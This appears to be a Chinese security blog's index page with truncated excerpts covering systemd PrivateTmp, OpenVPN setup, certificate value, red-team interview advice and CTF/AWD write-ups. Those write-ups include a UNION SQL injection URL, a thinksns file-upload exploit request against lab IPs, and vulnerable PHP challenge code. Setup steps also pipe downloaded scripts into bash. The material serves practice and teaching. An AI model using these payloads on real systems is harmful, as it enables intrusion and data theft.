Aru3h@rk's Blog

为什么你拿到的webshell环境的/tmp目录和正常用户的/tmp目录不一样？这一切都是因为Systemd的PrivateTmp机制！ 为什么www-data的tmp目录和正常用户的tmp不一样？因为经常使用/tmp路径用于webshell的临时操作目录，所以有时候会发现webshell拿到的/tmp目录的文件和正常用户（ubuntu、root…）看到的目录不一样。 www-data： ubuntu： 原因就是PrivateTmp机制。 PrivateTmp机制PrivateTmp 是 systemd 提供的一种 进程隔离机制，主要用于增强服务的安全性。它的核心功能是 为服务提供一个私有的 /tmp 和 /var/tmp 目录，防止不同服务之间（或服务与系统之间）通过临时文件互相干扰或攻击。 查看privatetmp模式是否启用： 1sudo systemctl show apache2 | grep PrivateTmp 当 PrivateTmp=yes 时，systemd 会为该服务 创建一个私有的 /tmp 和 /var/tmp ...

环境Ubuntu 20.04.4 LTS kvm 架构VPS 服务器配置不高 openvpn安装（服务端）我比较懒，所以用的一键脚本安装的。 使用工具： openvpn-install/README-zh.md at master · hwdsl2/openvpn-install (github.com) 下载安装脚本（注意辨别文件内容） 1wget -O openvpn.sh https://get.vpnsetup.net/ovpn 运行脚本自定义安装 1sudo bash openvpn.sh 没有绑定域名 N UDP快，TCP稳定，两个自己选，我这里选了TCP 更改监听端口，不要使用默认端口，改大一点。 默认 2 等待十几秒，openvpn安装完成后会根据上述配置生成一个ovpn配置文件。 这个时候ifconfig看一下，会有一个tun0的新网卡，这是openvpn的虚拟网卡 光安装完还不够，还需要配置nat转发 123sudo sysctl -w net.ipv4.ip_forward=1sudo iptables -t nat -A ...

前段时间考了NISP二级，客观地探讨一下NISP证书的含金量。 人才补贴 能拿人才补贴是真的，但是这些考证机构全都是截取片面的信息，或者直接转述一段话，具体要求还是自己去看政府公开的文件去研究，有的是可以直接根据证书领补贴，但是有的不仅仅是需要NISP证书/CISP证书，还有一些其他的要求（之前看到一个文件是对学历有要求的）。能领的钱有几千的也有上万的，看地方政策了。 找工作是否认可 大家可以去boss直聘等招聘软件去看看，网络安全实习生的招聘要求，只有极少极少的实习单位要求中声明（很久之前好像见过，搜了好多工作呀，终于看到一个写了NISP） “具有NISP证书者优先” 从NISP考试中其实也能看出端倪，NISP二级只学一天就能差不多，一百道题全部都是选择题，还发了题纲，懂的都懂。纯理论，没有实操，从这方面看NISP二级的难度还不如软考信息安全工程师，几百块钱，理论＋实操。 面乙方的时候，乙方都懂NISP什么含金量。面甲方的时候，光有一个NISP也不够吧？整啥不比NISP含金量高。 考证费用大家应该大部分人冲着CISP去的吧？毕竟 NISP号称《校园版CISP》， ...

前言纯是个人的浅薄理解，大佬勿喷。传递一些混子经验（x 时隔一年再次更新博客，最近一年都没有碰CTF比赛。 绝对不要透露任何项目相关的内容，不要在公共社交媒体发任何与项目相关的内容！ 面试 我个人感觉对于正常的CTF web方向选手而言，需要加强对常见nday漏洞的复现（weblogic\fastjson\shiro\spring…），内网渗透（略懂即可，在面试中占少量篇幅），应急响应（蓝队能力），溯源，还有就是业务能力、沟通能力，业务能力也是面试官比较看重的点，回答问题的时候尽量要体现自己的业务能力，一些专有名词得会，可以多看看技战法，学一学里面是怎么说的，多一点书面语表达。举个栗子， 12排查被入侵到发现入侵这段时间是否攻击其他主机排查入侵后的空白期内是否进行横向渗透 。有比赛经验的话在研判分析这方面是有基础的，除此之外还有一些奇奇怪怪的问题就需要积累了，客户现场啥都有可能。 不建议刚学网安的新人去hvv。如果真啥也不会，面试hvv去到现场可能会有清退的风险（项目没成还倒贴钱），这种方式到现场的都是要有独立处理能力的，想一想在客户现场你有信心独立面对客户吗（对自己负责，也对 ...

web-本科组ezrce1钥匙呢？ 这个key不知道干什么的 123456789101112131415161718<?phperror_reporting(0);include 'waf.php';header("Content-Type:text/html;charset=utf-8");echo "你是谁啊哥们？把钥匙给我！！！！<br/>";$key=$_GET['key'];$name=$_POST['name'];$qaq=waf($_POST['qaq']);if (isset($_GET['key'])){ highlight_file(__FILE__);}if (isset($name)){ echo "你是".$name."大人????<br/>"; $name1=preg_replace('/haha ...

2023 *CTFwebjwt2strutsjwt伪造＋struts2 一开始提示以需要以admin用户登录，然后源码给出了另一个php路径， 123456789101112131415161718192021<?phphighlight_file(__FILE__);include "./secret_key.php";include "./salt.php";//$salt = XXXXXXXXXXXXXX // the salt include 14 characters//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df@$username = urldecode($_POST["username"]);@$password = urldecode($_POST["password"]);if (!empty($_COOKIE["digest"])) { if ($usern ...

bugku AWD复现 S1-7 访问到错误页面得到cms的名字 1thinksns 方法一-前台洞因为当时不确定cms版本号是不是4.6，搜了很久，搜索一番最后尝试成功如下漏洞 （有些漏洞版本对上了，但是没成功 漏洞链接： thinksns apps\public\Lib\Action\AttachAction.class.php 任意文件上传 - 知道创宇 Seebug 漏洞平台 这里用的php4绕过，PHP不解析 请求包 1234567891011121314151617181920212223242526POST /index.php?app=public&mod=attach&act=ajaxUpload HTTP/1.1Host: 114.67.175.224:11377Content-Length: 328Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoun ...

bugku AWD复现 S1-4 搜索功能存在sql注入//这里一开始其实用的是盲注(lll￢ω￢) 写脚本写习惯了 1http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()%23 pe_ad,pe_admin,pe_article,pe_ask,pe_cart,pe_category,pe_class,pe_collect,pe_comment,pe_link,pe_order,pe_orderdata,pe_page,pe_payway,pe_product,pe_setting,pe_user 1http://114.67.175.224:10093/index.php/product/list? ...

最近备战国赛分区赛，开始在bugku上在线练习AWD，记录一下。 代理服务器配置需要VPS bugku的awd设置了IP白名单，只有在IP白名单里才能正常访问靶机。 emm，实验室的wifi不知道为什么，明明把公网IP加入了白名单，但是不能正常访问靶机（不太懂。 所以我特意架设了代理。设置服务器的IP为白名单就可以流畅地连接上靶机。 X-UI安装X-UI或者Xray都可以，只是我先看到X-UI的教程（ vaxilu/x-ui: 支持多协议多用户的 xray 面板 (github.com) 只需要简单的一行命令就可以完成安装 1bash <(curl -Ls https://raw.githubusercontent.com/vaxilu/x-ui/master/install.sh) 安装完成后就可以打开web页面配置代理了。 有的教程说是打开所有端口 (lll￢ω￢) 其实不需要，只需要把web界面的端口，需要用到的代理端口打开即可，全都开可能会有安全隐患。 代理配置在入站列表配置代理 vmessvmess协议的，比较简单，不需要配证书。默认的配置就可以使用了。 ...

安洵杯2023只有两题web CarelessPy1来签到噢♡欸不会连签到都不会吧杂鱼♡杂鱼♡ 主页有个download路由，但是过滤了proc app.py part.py等一些关键词。 源码给出了另外两个路由/eval和/login /eval路由一开始没懂，后来一开不就是根目录下的东西，列目录 1cmd=/app 查看/app路径文件 1['__pycache__', 'part.py', 'templates', 'static', 'app.py', 'requirements.txt'] pycache文件夹中含有pyc文件，在线网站反编译一下得到part.py 1234567import osimport randomimport hashlibfrom flask import *from lxml import etreeapp = Flask(__name__)app.config['SE ...